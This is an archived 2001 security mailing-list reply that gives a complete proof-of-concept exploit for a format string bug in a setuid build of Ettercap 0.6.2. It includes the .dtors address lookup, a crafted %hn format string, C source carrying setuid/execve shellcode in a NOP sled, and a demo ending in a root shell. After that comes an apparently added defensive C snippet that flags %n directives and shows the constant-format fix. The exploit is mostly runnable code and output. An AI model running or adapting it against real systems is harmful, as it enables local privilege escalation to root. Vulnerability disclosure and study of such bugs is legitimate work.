Proof of concept for the format bug in Ettercap 0.6.2
From: BAILLEUX Christophe (cb@t-online.fr) Date: 12/05/01
- In reply to: Blue Boar: "Potential hole in Ettercap 0.6.2"
Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET)
From: BAILLEUX Christophe <cb@t-online.fr>
To: Blue Boar <BlueBoar@thievco.com>
Firstly, let's retrieve the address of the section .dtors:
cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap
/usr/local/sbin/ettercap: file format elf32-i386
Contents of section .dtors:
8119a70 ffffffff 00000000 ........
cb@tshaw$
So the fmt string is composed of:
- "000" for alignment.
- "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
expect to write (here .dtors + 4 -- 0x8119a74.)
- "%.49119x%16$hn%.16145x%15$hn" writes the return address, pointing into the shellcode.
This format string was built using fmtbuilder:
http://minimum.inria.fr/~raynal/index.php3?page=501
---- ettercap-exp.c ----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char buf[1024];
    char shellcode[] =
        /* setuid(0) */
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        /* Aleph 1 shellcode */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    /* format string built with fmtbuilder (see above): two %hn writes to .dtors + 4 */
    char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";

    /* NOP sled with the shellcode (and its terminating NUL) at the end, passed via the environment */
    memset(buf, 0x90, sizeof(buf));
    memcpy(buf + sizeof(buf) - sizeof(shellcode), shellcode, sizeof(shellcode));
    setenv("SHELLCODE", buf, 1);
    execl("/usr/local/sbin/ettercap", "ettercap", fmt, (char *)NULL);
    return 0;
}
---- ettercap-exp.c ----
Demo:
This demo was made with a setuid-root build.
cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
cb@tshaw$ ./ettercap-exp
ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...
Invalid host address
000tv00000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
....snip....
0000000000000000000000000000000000000000000000081020c0 !!
sh-2.04# id
uid=0(root) groups=100(users)
Best regards,
--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr
On Tue, 4 Dec 2001, Blue Boar wrote:
> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
>
> Here's the basic problem:
>
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
>
> may the packets be with you...
>
>
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
>
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
>
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web
> interface.)
>
> BB
>
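The bug both messages describe is the untrusted host argument reaching a printf-family call as the format string. The following is an added C example, not Ettercap's code nor the poster's: a small classifier that flags an input by the format directives it carries (plain %x reads as in Blue Boar's probe versus the %n write the PoC relies on), next to the constant-format error reporting that removes the bug. All function and enum names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Risk level of an untrusted string if it were used as a printf format. */
enum fmt_risk { FMT_CLEAN = 0, FMT_READS = 1, FMT_WRITES = 2 };

enum fmt_risk classify_format(const char *s)
{
    enum fmt_risk risk = FMT_CLEAN;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')           /* "%%" is a literal percent sign, harmless */
            continue;
        if (*p == '\0')          /* a trailing lone '%' is undefined for printf */
            return FMT_READS;
        /* skip flags, width, precision, positional index ("16$") and length
         * modifiers ("h", "l", ...) so we land on the conversion character */
        while (*p && strchr("0123456789.-+ #*$hlLqjzt", *p))
            p++;
        if (*p == 'n')           /* %n stores a byte count: the write primitive used in this PoC */
            return FMT_WRITES;
        risk = FMT_READS;        /* any other conversion reads stack slots it was never given */
        if (*p == '\0')
            break;
    }
    return risk;
}

/* The vulnerable shape in the post is, in effect, snprintf(out, n, host):
 * the attacker-controlled value is the format.  The fix is a constant
 * format with the untrusted value passed only as a %s argument.  Writes the
 * rendered message into out and returns its length (as snprintf does). */
int report_host_error(char *out, size_t n, const char *host)
{
    return snprintf(out, n, "Invalid host address %s !!", host);
}
```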